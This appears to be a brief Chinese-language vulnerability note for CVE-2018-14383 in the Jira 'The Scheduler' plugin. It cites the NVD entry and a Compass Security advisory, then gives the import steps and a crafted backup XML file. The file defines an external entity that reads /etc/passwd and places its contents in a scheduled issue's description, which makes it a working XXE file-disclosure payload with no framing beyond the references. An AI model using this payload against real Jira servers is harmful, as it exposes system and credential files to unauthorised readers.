参考:
https://nvd.nist.gov/vuln/detail/CVE-2018-14383
https://www.compass-security.com/fileadmin/Datein/Research/Advisories/CSNC-2018-022_jira_plugin_the_scheduler.txt
安装插件:
引入xml文件
Administration > Add-ons > Import Scheduled Issues
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<!DOCTYPE Document [
<!ENTITY c SYSTEM "/etc/passwd">
]>
<TheSchedulerBackup xmlns="http://www.tt.com.pl">
<BackupInformation>
<JiraVersion>7.7.0</JiraVersion>
<PluginVersion>5.1.3</PluginVersion>
<BackupVersion>2.0</BackupVersion>
<BackupCreator>Administrator</BackupCreator>
<BackupTime>Jun 19, 2018 11:55:11 AM</BackupTime>
<ExportType>all</ExportType>
<SkipDisabled>false</SkipDisabled>
<SkipInvalid>false</SkipInvalid>
</BackupInformation>
<TheSchedulerData>
<ScheduledIssueElement>
<name>Compass Security Test</name>
[CUT]
<ParamElement>
<paramName>description</paramName>
<paramValue>&c;</paramValue>
</ParamElement>
[CUT]
</ScheduledIssueElement>
</TheSchedulerData>
</TheSchedulerBackup>